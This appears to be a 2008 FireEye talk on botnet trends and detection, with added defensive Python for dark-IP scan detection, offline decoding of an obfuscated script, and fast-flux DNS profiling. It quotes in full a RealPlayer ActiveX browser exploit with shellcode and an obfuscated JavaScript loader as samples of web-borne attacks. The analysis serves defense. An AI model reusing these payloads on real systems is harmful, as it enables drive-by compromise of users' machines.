Lit Space Monitoring for Botnets
Stuart Staniford, Chief Scientist
1/21/2008
Botnets = Targeted Infection + Remote Control Payload
Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities
Remote control payload enables further malicious payload installs
Malicious payloads enable monetization via:
- Spam relay (leased to spammers)
- DDoS (extortion business model)
- ID theft (consumer, business, or gov't)
- Intellectual property theft
- Phishing site hosting
- Click fraud
- Online financial services fraud
- E-commerce site fraud
Botnets Are A Critical Threat
Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007
Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches.
Up to a quarter of computers on the net may be used by cyber criminals in so-called botnets - Vint Cerf
Botnets: A Global Pandemic
[Chart: "Growing Wave of Concern" / "Botnet Attack Evolution". Vertical axis: Magnitude of Threat, Low to High. Horizontal axis, three phases: Nuisance (late 1990s - 2002), Concern (2003 - 2006), Danger (2007 - beyond). Target classes shown: Consumer, Service Provider, Enterprise, Government / Cyber warfare. Attack and impact labels, grouped as on the chart: Mass-scale DDoS, Mass-scale SPAM, Click fraud, Identity Theft, Phishing, Pharming; Wide-scale revenue loss, Corporate Espionage, Total enterprise collapse, Intellectual Property Theft, Compliance Risks, Productivity Loss, Brand Damage, Resource Inefficiency; Cyber-terrorism; DDoS, SPAM, Spyware platform, Steal resources.]
Traditional Botnet (first half 2000s)
Grow by active scanning
Command & Control via IRC
Still a lot of that about
[Figure: portion of a botnet tracked by the FireEye botwall network]
Monitoring Traditional Botnets
Dark IP Space/Network Telescope
Wait for a bot to scan the unused addresses, and try to capture it
Tradeoffs of Dark IP Monitoring
Advantages
- Fidelity: if something scans dark IP space, it is likely bad
- Cheap/easy: can cover a lot of IP space that wasn't being used, especially internally to enterprises
Disadvantages
- Some bots avoid the dark IP space (they scan selectively)
- Persuading the bot to talk can be tricky; a deep-interaction honeypot is needed to do it right
- Bots are moving away from scanning as a technique
- Bot owners can learn the dark IPs if there is feedback (e.g. into signatures)
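The dark-IP telescope described above, as an added example that is not code from the slides or from FireEye: it reads flow records, keeps only the ones whose destination lies in address space that is routed but has no hosts, and calls a source a scanner once it has touched a handful of distinct dark addresses. The dark ranges, the record format and the sample flows are constructed for the example; the two non-scanner hosts illustrate the blind spots listed under Disadvantages (a host that never leaves lit space is invisible, and a selective scanner that brushes dark space only once stays under the threshold).

```python
"""Dark-IP (network telescope) scan detection over flow records.

Added example, not code from the slides or from FireEye.  The dark address
ranges, the record format and the flow records are constructed.
"""
import ipaddress
import re
from collections import defaultdict

# Internal ranges that are routed but have no hosts assigned ("dark" space).
# Constructed for this example; a real deployment takes these from the IPAM.
DARK_RANGES = [
    ipaddress.ip_network("10.9.0.0/16"),
    ipaddress.ip_network("10.200.0.0/24"),
]

# Constructed flow records, one connection attempt per line.
#   10.1.2.3  sweeps dark space on 445/139 (classic scanning bot)
#   10.1.5.9  only talks to lit hosts (never seen by the telescope)
#   10.1.7.7  scans live hosts and grazes dark space once (selective scanner)
SAMPLE_FLOWS = """\
2008-01-21T10:00:01 src=10.1.2.3 dst=10.9.0.17 dport=445 proto=tcp
2008-01-21T10:00:01 src=10.1.2.3 dst=10.9.0.18 dport=445 proto=tcp
2008-01-21T10:00:02 src=10.1.2.3 dst=10.9.0.19 dport=445 proto=tcp
2008-01-21T10:00:02 src=10.1.2.3 dst=10.9.1.4 dport=139 proto=tcp
2008-01-21T10:00:03 src=10.1.2.3 dst=10.9.1.5 dport=139 proto=tcp
2008-01-21T10:00:03 src=10.1.2.3 dst=10.200.0.9 dport=445 proto=tcp
2008-01-21T10:00:04 src=10.1.2.3 dst=10.200.0.10 dport=445 proto=tcp
2008-01-21T10:00:04 src=10.1.2.3 dst=10.200.0.11 dport=445 proto=tcp
2008-01-21T10:00:05 src=10.1.5.9 dst=10.1.1.20 dport=80 proto=tcp
2008-01-21T10:00:06 src=10.1.5.9 dst=10.1.1.21 dport=53 proto=udp
2008-01-21T10:00:07 src=10.1.7.7 dst=10.1.1.30 dport=445 proto=tcp
2008-01-21T10:00:07 src=10.1.7.7 dst=10.1.1.31 dport=445 proto=tcp
2008-01-21T10:00:08 src=10.1.7.7 dst=10.9.3.3 dport=445 proto=tcp
2008-01-21T10:00:08 src=10.1.7.7 dst=10.1.1.32 dport=445 proto=tcp
"""

FLOW_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+) proto=(\S+)$")


def parse_flow(line):
    m = FLOW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable flow record: {line!r}")
    ts, src, dst, dport, proto = m.groups()
    return {"ts": ts, "src": ipaddress.ip_address(src),
            "dst": ipaddress.ip_address(dst), "dport": int(dport), "proto": proto}


def is_dark(ip):
    return any(ip in net for net in DARK_RANGES)


def telescope(flow_text, threshold=5):
    """Return {src: summary} for sources that hit >= threshold distinct dark addresses.

    Fidelity comes from the destination, not the payload: no legitimate host has a
    reason to send to an address that was never assigned, so each dark hit is a
    strong signal and a handful of them is enough to call a scanner.
    """
    hits = defaultdict(lambda: {"dark_targets": set(), "ports": set(),
                                "first": None, "last": None})
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        f = parse_flow(line)
        if not is_dark(f["dst"]):
            continue                      # lit-space traffic is invisible here
        h = hits[str(f["src"])]
        h["dark_targets"].add(str(f["dst"]))
        h["ports"].add(f["dport"])
        h["first"] = h["first"] or f["ts"]
        h["last"] = f["ts"]
    return {
        src: {"dark_targets": len(h["dark_targets"]), "ports": sorted(h["ports"]),
              "first": h["first"], "last": h["last"]}
        for src, h in hits.items() if len(h["dark_targets"]) >= threshold
    }


if __name__ == "__main__":
    for src, info in telescope(SAMPLE_FLOWS).items():
        print(f"{src}: {info['dark_targets']} dark targets on ports {info['ports']} "
              f"between {info['first']} and {info['last']}")
```

Lowering the threshold to 1 surfaces the selective scanner as well, at the cost of alerting on every stray packet into dark space (misconfigured clients, stale DNS); the threshold is where the fidelity/coverage trade-off in the slide's list is actually set.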
Directions in Botnet Technology
Technology evolution is rapid: a well-funded industry, smart technologists, and disciplined execution of attacks and management of resources/business. This gives various trends that render current defensive technologies obsolete:
1. Exploits via web/email (bypass the firewall)
2. Obfuscation and polymorphism (bypass AV/IPS)
3. Distributed command-and-control, and high turnover of assets:
   1. renders trackdown and clean-up hard
   2. DNS tracking hard
   3. Web crawling behind the curve
Exploits via web
if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75%06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var 
cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvkKNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NXKjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnXzmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSNzT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWinInPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZodKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZoWsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInOoDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vvYiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQelhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJQspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsqmk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLNktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();
More obfuscated example
<script language=JavaScript>function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23,3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&255;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb4Ta45pZ9ooUb2HfhDsXkcYfh3BCNgf8N@YJ45EXyi9ZPwkXown8bIs8BTy9k3hvo_k5o@9YV@GDMTzXo3SXBwn8MIGdk31CNISWN@kgV5pRMVId9xKa45pRmeKvy28iZcU5y2oa45acGeK0qIGdk31CN4SWN@Hwy2myMwcUkdQaP_cvP@u9mTlJpTaiZcu8o@kWB_HfhDsXkcCfh3BCNgjvo_S8NIWdP@n9mTGvowYXhIYXkcCibIvvEVf9hdsCVT8ix5kjPThJkIvdE3SCNwWaFIsWVxS6k3mg4TMdEIW5E@ljP_HwiwnXo@1XP_HYyDsUEwWXo@Cw25y0ZTvvo@HYyDsUEwkCVxL6oIQ9hcAxpTau2_S9BTEXi_Q9N@k5owmJkIvdE3SCNwWaFIsWVoQ9N@k5owyiZTvvo@Hwb2sUkInjEwW6kc1vo_k1kIn5o@1uBwSCV3l9hwyiZTkjPThwb2sUkInjEwW6oguXkIW8PdhyMokaEtWyF6HOFcHgFtkuMDaumTvvo@Hljd15JVmlb3n5aokaEidXo@udEw1DFeKjh3W8hdlak6yiZTHujIn8PdqdE@nWFcHZPwkXowndiwX5o@FvP_k5ow1OP@s6bd15o@dXo@udEw1e45HuM@OdP_fDPThljd15JVkiZTHxV5HumTfvE@QW2TOD9VO92UaumTHum0@5aV@9qisvP_fDk3z6ptyiZTHumT6XBwGjj3W8hdlakcfUkdQaP_Eao3l9hwSChdlaogSWB@Mdowl9VoQ9N@k5owyiZTHumT@vP_fDPxk8B_mbb_GUooQ9N@k5ow1ZB@GdP_hyMUCwMUaumTHu23l9BThbhIWWFdmuqUHwPTpumVSCNIhUbduCVgGXowYCBdyuFdbxF6HxBTkjPThujIn8PdqdE@nejd26GcCZ9VWyF6HxBTVWairW0txWhIn8PdQCkcAxpTmWFraumTHuFdXWm6VWairW0txWhIn8PdQCkcmOG6HxBTKDB@G5kdnab_F9k3W6GUyuFrHiZTHumTQUE@QWMDHYyDsUEwkCVxL6oIQ9hcPxpTmW25HumTHyo@QvEdyumTHu25HumTfvE@QW2TO9qeO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbe45HumTfvE@QW2TO9qeulVT9iZTHumTKDB@G5kdnab_F9k3W6GUyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TOayoO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbepTHumTHiZTHuMIS8h3HyM_PYq_Ci45HumTHYyDsUEwkCVxL6oIQ9hcAx45HumTHyo@QvEdyumTHumTaumTH
ZkIuXPTClhUBlVT9iZTHumTKDB@G5kdnab_F9k3W6GtyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TO6b2O92UaumTHuF2BWBwldP_5XhwCXo@mOqUaumTHu2IWXkIbepTHumTHiZTHum3QjkILUP_9umTaumTHuF2BWBwldP_5XhwCXo@mwqUHu25HumTHyo@QvEdyumTHiZTHgV5HuM@OdP_fDPThYyDsUEwkCVxL6oIQ9h6aumTy0ZTHuMIS8h3HuFt9iZTHumTC9h3SeEUaumTHZkIuXPTHw4UaumTHumwl8kIndEw1amdWXo3myMgQDP@lYPdsvqiW1E3zaP_WuG7AJmdn6oTyiZTHumTC9h3SeEUHu25HumTzXo3SXBwn045HumTHyo@QvEdyumTHumTHu25HuFrauFragV5abk_18P_k5owHlb3n5aokaEidXo@udEw1DFeK50_Q9N@kiRDauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gAlF6HOFcHgFtku2@QCh_WaPTClB0@1VTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gWlF6HOFcHgFtku2@QCh_WaPTClVtJ8q_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWF71uqKkuFTmuFgAwmTWXP_L9VwHyM_WxJ_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWm7YwmTSgpTFOG6Hyh3nXV@1W2TOayoO925Hwo3HrFeK50_Q9N@1wowzXPDRjP6Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2@QCh_WaPTClhUBlVTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaPTPrBTnJFUYwmTSgpTFOG6Hyh3nXV@1W2TO6b2O925m0x5pRM@f9hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25")</script>
Variables and encoding can be polymorphic - not much for signatures to go on
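What a signature cannot do, a decoder can. The following is an added example, not code from the slides: a stand-alone re-implementation of the dc() routine in the obfuscated sample above, so the second stage can be recovered without letting it reach eval("document.write(r)"). The lookup table T, the ASCII offset 48, the little-endian 6-bit packing and the XOR key 165 are transcribed from the sample; encode() is our own inverse, used only to construct test input. The first eight characters of the slide's encoded string are included so the decoder can be checked against the real thing: they decode to "<HTML ".

```python
"""Recovering the second stage of the obfuscated sample without executing it.

Added example, not code from the slides.  T, the offset 48, the bit packing
and the XOR key 165 are transcribed from the sample's dc(); encode() is our
own inverse, used to build test input.
"""

# Transcribed from the sample: t[charCode - 48] is the 6-bit value of a character.
T = [63, 11, 56, 48, 57, 43, 35, 36, 27, 31, 0, 0, 0, 0, 0, 0, 53, 20, 29, 7, 55,
     44, 8, 9, 5, 49, 46, 32, 16, 40, 45, 18, 28, 0, 42, 4, 33, 39, 61, 23, 3, 2,
     26, 0, 0, 0, 0, 52, 0, 47, 14, 38, 51, 59, 6, 34, 13, 62, 15, 12, 10, 24, 17,
     60, 25, 41, 54, 21, 37, 22, 19, 50, 58, 30, 1]
XOR_KEY = 165  # the sample computes 165 ^ w before emitting each byte

# The 64 characters the sample actually uses: digits, '@', A-Z, '_', a-z.
# 'Q' legitimately maps to 0; the other zero slots in T are unused punctuation.
ALPHABET = "0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
VALUE_TO_CHAR = {T[ord(c) - 48]: c for c in ALPHABET}
assert len(VALUE_TO_CHAR) == 64, "T restricted to ALPHABET is a permuted base64 alphabet"

# First characters of the encoded string on the slide (copied from the page).
SAMPLE_PREFIX = "pryoMUyT"


def decode(encoded: str) -> bytes:
    """Pure re-implementation of dc(): same state machine, but the bytes are
    returned instead of being handed to eval("document.write(r)")."""
    out = bytearray()
    w = s = 0
    for ch in encoded:
        if ch not in ALPHABET:
            raise ValueError(f"{ch!r} is outside the sample's alphabet")
        w |= T[ord(ch) - 48] << s
        if s:                       # 2nd, 3rd and 4th char of a group emit a byte
            out.append((w & 0xFF) ^ XOR_KEY)
            s -= 2
            w >>= 8
        else:                       # 1st char of a group only primes the accumulator
            s = 6
    return bytes(out)


def encode(plain: bytes) -> str:
    """Inverse of decode(): 3 bytes -> 4 chars, little-endian bit order, no padding."""
    b = [x ^ XOR_KEY for x in plain]
    out = []
    for i in range(0, len(b), 3):
        chunk = b[i:i + 3]
        b0 = chunk[0]
        out.append(VALUE_TO_CHAR[b0 & 63])
        if len(chunk) == 1:
            out.append(VALUE_TO_CHAR[b0 >> 6])
            break
        b1 = chunk[1]
        out.append(VALUE_TO_CHAR[(b0 >> 6) | ((b1 & 15) << 2)])
        if len(chunk) == 2:
            out.append(VALUE_TO_CHAR[b1 >> 4])
            break
        b2 = chunk[2]
        out.append(VALUE_TO_CHAR[(b1 >> 4) | ((b2 & 3) << 4)])
        out.append(VALUE_TO_CHAR[b2 >> 2])
    return "".join(out)


if __name__ == "__main__":
    print(decode(SAMPLE_PREFIX))            # the second stage begins with b'<HTML '
    stage2 = b"<script>document.write('hello')</script>"
    assert decode(encode(stage2)) == stage2
```

Feeding the whole encoded string from the slide through decode() yields the second-stage HTML as text, which can then be inspected, or fed to the same decoder again if it is nested, without a browser ever parsing it. The point of the slide stands: every name in dc(), the table order and the XOR key can change per copy, so the durable handle is the sink (document.write of a decoded string), not any byte pattern.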
Preliminary Experiment on an Open Network (Dec)
- ~5000 users, ~3 hrs of intermittent data
- Parsed HTTP and entities: ~200,000 HTTP-containing flows
- Google Safe Browsing API alerted on ~700 of them
- Manually verified: only 11 checked out
- Daily rate is ~100 incidents/day
- Don't know how many were successful at this point
- Not sure how typical this period is, so only an order-of-magnitude estimate
- Google Safe Browsing API is 99%+ false positives; reasons not well understood yet
- Gearing up for another experimental run; hopefully a LEET 08 paper
Distributed Command and Control - Storm
- Grows by spam/malicious downloads; has been running for 12 months now in plain sight. No scanning!
- 115,000 seen from a single .edu
- Peer-to-peer command and control carried in eDonkey UDP messages
Dynamic Infrastructure - Fast Flux
- DNS servers
- Small number of persistent content servers
- Large number of dynamic proxies
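One way to spot the "large number of dynamic proxies" layer from the DNS side, as an added example that is not code from the slides: profile each queried name over a series of observed A-record answers and look for the combination that a flux front end produces and a normal host does not: short TTL, many distinct addresses, addresses scattered across unrelated networks, and answers that keep introducing never-seen addresses. The observations are constructed; the /16 prefix count is a crude stand-in for per-address AS lookups, which need external routing data. A CDN-like name is included because it shares the short TTL and the address count, and is told apart only by the network-diversity check.

```python
"""Fast-flux heuristic over observed DNS answers.

Added example, not code from the slides.  Observations are constructed; the
/16 prefix count stands in for AS lookups, which need external routing data.
"""
import ipaddress
from collections import defaultdict

# (seconds since start, qname, TTL, A records) as a passive-DNS sensor would log them.
OBSERVATIONS = [
    # Flux name: every answer hands out fresh proxies in unrelated networks.
    (0,     "update.flux-example.test", 300, ["100.64.1.10", "100.65.2.20", "100.66.3.30"]),
    (300,   "update.flux-example.test", 300, ["100.67.4.40", "100.68.5.50", "100.69.6.60"]),
    (600,   "update.flux-example.test", 300, ["100.70.7.70", "100.71.8.80", "100.72.9.90"]),
    (900,   "update.flux-example.test", 300, ["100.73.1.11", "100.74.2.22", "100.75.3.33"]),
    # CDN-like name: short TTL and many addresses too, but all in one provider block.
    (0,     "static.cdn-example.test", 60, ["203.0.113.1", "203.0.113.2", "203.0.113.3"]),
    (60,    "static.cdn-example.test", 60, ["203.0.113.4", "203.0.113.5", "203.0.113.6"]),
    (120,   "static.cdn-example.test", 60, ["203.0.113.7", "203.0.113.8", "203.0.113.9"]),
    (180,   "static.cdn-example.test", 60, ["203.0.113.10", "203.0.113.11", "203.0.113.12"]),
    # Ordinary name: long TTL, stable answers.
    (0,     "www.example.test", 86400, ["198.51.100.5", "198.51.100.6"]),
    (86400, "www.example.test", 86400, ["198.51.100.5", "198.51.100.6"]),
]


def prefix16(ip: str) -> str:
    """Containing /16, used here as a rough proxy for 'different network'."""
    return str(ipaddress.ip_network(f"{ip}/16", strict=False))


def profile(observations):
    """Per-qname summary: distinct addresses, distinct /16s, largest TTL seen,
    and churn = fraction of follow-up answers that introduced a never-seen address."""
    per = defaultdict(lambda: {"ips": set(), "prefixes": set(), "max_ttl": 0,
                               "answers": 0, "fresh": 0})
    for _, qname, ttl, answers in sorted(observations, key=lambda o: o[0]):
        p = per[qname]
        p["answers"] += 1
        p["max_ttl"] = max(p["max_ttl"], ttl)
        if p["answers"] > 1 and any(a not in p["ips"] for a in answers):
            p["fresh"] += 1
        p["ips"].update(answers)
        p["prefixes"].update(prefix16(a) for a in answers)
    return {q: {"ips": len(p["ips"]), "prefixes": len(p["prefixes"]),
                "max_ttl": p["max_ttl"],
                "churn": p["fresh"] / (p["answers"] - 1) if p["answers"] > 1 else 0.0}
            for q, p in per.items()}


def is_fast_flux(p, max_ttl=300, min_ips=8, min_prefixes=4, min_churn=0.5):
    """All four must hold: proxies are short-lived (TTL), numerous (ips),
    scattered across networks (prefixes) and keep being replaced (churn).
    Thresholds are illustrative; tune them against your own passive-DNS baseline."""
    return (p["max_ttl"] <= max_ttl and p["ips"] >= min_ips
            and p["prefixes"] >= min_prefixes and p["churn"] >= min_churn)


def find_fast_flux(observations, **thresholds):
    return sorted(q for q, p in profile(observations).items()
                  if is_fast_flux(p, **thresholds))


if __name__ == "__main__":
    for q, p in profile(OBSERVATIONS).items():
        print(f"{q}: {p} -> {'FLUX' if is_fast_flux(p) else 'ok'}")
```

Dropping the network-diversity criterion (min_prefixes=1) flags the CDN name as well, which is the usual false positive of TTL-and-count heuristics; in practice the /16 check would be replaced by an AS lookup, and the persistent content servers behind the proxies would be found by following where the proxies forward, which DNS alone does not show.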
FireEye, Inc. Confidential 15
Rendering Current Approaches Obsolete
- Antivirus: bypassed by not matching AV signatures
- IDS/IPS: bypassed by not matching signatures and by using other infection vectors
- Network Behavior Analysis: bypassed by low & slow spread
- Dark IP Honeypots: bypassed by not targeting dark IP addresses and honeypots
GAP: need a security solution that scales with the exponential nature of the threat
Lit Space Monitoring
Global Deployment
Local Analysis & Protection
Global Analysis & Intelligence Distribution
Thank you!
Q & A